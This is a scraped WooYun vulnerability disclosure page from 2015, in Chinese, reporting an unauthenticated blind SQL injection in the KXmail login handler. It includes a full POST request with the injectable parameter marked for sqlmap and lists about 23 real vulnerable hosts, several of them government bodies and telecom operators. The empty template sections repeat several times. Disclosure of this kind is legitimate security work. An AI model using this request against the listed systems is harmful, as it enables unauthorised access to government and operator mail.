科信邮件系统漏洞另一处SQL盲注(无需登录23案例涉及政府部门运营商)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122071

漏洞标题：科信邮件系统漏洞另一处SQL盲注(无需登录23案例涉及政府部门运营商)

漏洞作者： YY-2012

提交时间：2015-06-22 12:13

修复时间：2015-09-22 15:08

公开时间：2015-09-22 15:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-22：细节已通知厂商并且等待厂商处理中
2015-06-24：厂商已经确认，细节仅向厂商公开
2015-06-27：细节向第三方安全合作伙伴开放
2015-08-18：细节向核心白帽子及相关领域专家公开
2015-08-28：细节向普通白帽子公开
2015-09-07：细节向实习白帽子公开
2015-09-22：细节向公众公开

简要描述：

某些政府部门，国营企业和运营商都使用了这套系统，但依然没有对编号为WooYun-2014-66892和WooYun-2014-65810上的漏洞进行修复，现在再提交另一处注入会不会得到重视主动去修复呢？

详细说明：

为什么说有些部门不修复呢？请看看 WooYun: 某省人大邮件系统漏洞有些地方部门的不作为，以上漏洞公开几十天后依然注入文中指出的注入，现在提交另一处注入会不会重视呢？
在寻找案例发现几个重要政府部门，国营企业和运营商，分别是：
成都立即送物流有限公司 -- 科信邮件系统(KXmail)『成都商报的』
成都商报发行投递广告有限公司 -- 科信邮件系统
重庆人大 -- 科信邮件系统(KXmail)
河北省卫生厅电子邮件系统
海南铁通 -- 科信邮件系统(KXmail)
广东数字证书认证中心有限公司 -- 科信邮件系统
四川省环境监测总站 -- 科信邮件系统(KXmail)
WooYun: 科信邮件系统漏洞注入文件任意下载等小集和 WooYun: KXmail（科信软件）无需登陆SQL盲注漏洞提及都是“找回密码”处get_passwd.php文件的SQL注入，忽略了邮件系统登录页面login.server.php文件存在SQL注入。
使用sqlmap对提交的账号后门加*号进行指定参数注入。
例子：

POST /prog/login.server.php HTTP/1.1
Host: 110.249.216.70
Content-Length: 1232
Cache-Control: max-age=0
Origin: https://110.249.216.70
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: https://110.249.216.70/prog/index.php?language=chinese_gb.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=6db583f5cef39c382e00cb1390ae838b
xjxfun=Function_PostLogin&xjxr=1434907361662&xjxargs[]=%3Cxjxobj%3E%3Ce%3E%3Ck%3Elo_os%3C%2Fk%3E%3Cv%3ESWindows_NT%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Elo_processor%3C%2Fk%3E%3Cv%3ES%3C!%5BCDATA%5BEM64T%20Family%2015%20Model%206%20Stepping%208%2C%20GenuineIntel%5D%5D%3E%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Elo_computername%3C%2Fk%3E%3Cv%3ESRD-HL-EMAIL%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Elo_user_agent%3C%2Fk%3E%3Cv%3ES%3C!%5BCDATA%5BOpera%2F9.80%20(Windows%20NT%206.0)%20Presto%2F2.12.388%20Version%2F12.14%5D%5D%3E%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Elo_ip%3C%2Fk%3E%3Cv%3ES58.255.73.45%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Elo_language%3C%2Fk%3E%3Cv%3ES%3C!%5BCDATA%5Bzh-CN%2Czh%3Bq%3D0.8%5D%5D%3E%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Euser%3C%2Fk%3E%3Cv%3ESadmin139*%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Edomain%3C%2Fk%3E%3Cv%3ESccpc.cq.cn%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Epasswd%3C%2Fk%3E%3Cv%3ESadmin%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Eco_language_select%3C%2Fk%3E%3Cv%3ES%3C!%5BCDATA%5B..%2Flanguage%2Fchinese_gb.php%5D%5D%3E%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Eco_sy_id%3C%2Fk%3E%3Cv%3ES10%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Erandom_pic%3C%2Fk%3E%3Cv%3ES5139%3C%2Fv%3E%3C%2Fe%3E%3Ce%3E%3Ck%3Erandom_num%3C%2Fk%3E%3Cv%3ES240955%3C%2Fv%3E%3C%2Fe%3E%3C%2Fxjxobj%3E

漏洞证明：

http://mail.pushmold.com/prog/index.php?language=chinese_gb.php
http://mail.cdljs.com/prog/index.php?language=chinese_gb.php  成都立即送物流有限公司 -- 科信邮件系统(KXmail)
http://118.122.94.117/prog/index.php?language=chinese_gb.php  成都商报发行投递广告有限公司 -- 科信邮件系统(KXmail)
http://www.lthcn.com/prog/index.php?language=chinese_gb.php
http://125.69.74.58/prog/index.php?language=chinese_gb.php
http://mail.chinapolymetallic.com:82/prog/index.php?language=chinese_gb.php
http://mail.ccpc.cq.cn/prog/index.php?language=chinese_gb.php  重庆人大 -- 科信邮件系统(KXmail)
https://110.249.216.70/prog/index.php?language=chinese_gb.php  欢迎访问河北省卫生厅电子邮件系统
http://219.141.250.81/prog/index.php?language=chinese_gb.php
http://220.166.95.195/prog/index.php?language=chinese_gb.php
http://118.112.183.88:8888/prog/index.php?language=chinese_gb.php
http://mail.cat898.com/prog/index.php?language=chinese_gb.php  海南铁通 -- 科信邮件系统(KXmail)
http://221.236.172.93:8888/prog/index.php?language=chinese_gb.php
http://218.89.222.38/prog/index.php?language=chinese_gb.php
http://218.207.9.84/prog/index.php?language=chinese_gb.php
http://mail.gdca.com.cn/prog/index.php?language=chinese_gb.php  广东数字证书认证中心有限公司 -- 科信邮件系统(KXmail) 
http://202.103.187.170:81/prog/index.php?language=chinese_gb.php
http://118.122.118.76/prog/index.php?language=chinese_gb.php   四川省环境监测总站 -- 科信邮件系统(KXmail)
http://183.230.37.128:8888/prog/index.php?language=chinese_gb.php
http://112.14.187.54/prog/index.php?language=chinese_gb.php
https://101.251.112.156/prog/index.php?language=chinese_gb.php
http://125.68.186.130:8888/prog/index.php?language=chinese_gb.php
http://mail.ailin-china.com/prog/index.php?language=chinese_gb.php

修复方案：

联系各单位。

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-06-24 15:07

厂商回复：

CNVD确认并复现所述情况，已经由CNVD通过网站公开联系方式向软件生产厂商通报，涉及案例联系转由CNCERT向相关部门通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122071

漏洞标题：科信邮件系统漏洞另一处SQL盲注(无需登录23案例涉及政府部门运营商)

相关厂商：成都科信科技有限公司

漏洞作者： YY-2012

提交时间：2015-06-22 12:13

修复时间：2015-09-22 15:08

公开时间：2015-09-22 15:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122071

漏洞标题：科信邮件系统漏洞另一处SQL盲注(无需登录23案例涉及政府部门运营商)

相关厂商：成都科信科技有限公司

漏洞作者： YY-2012

提交时间：2015-06-22 12:13

修复时间：2015-09-22 15:08

公开时间：2015-09-22 15:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122071"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：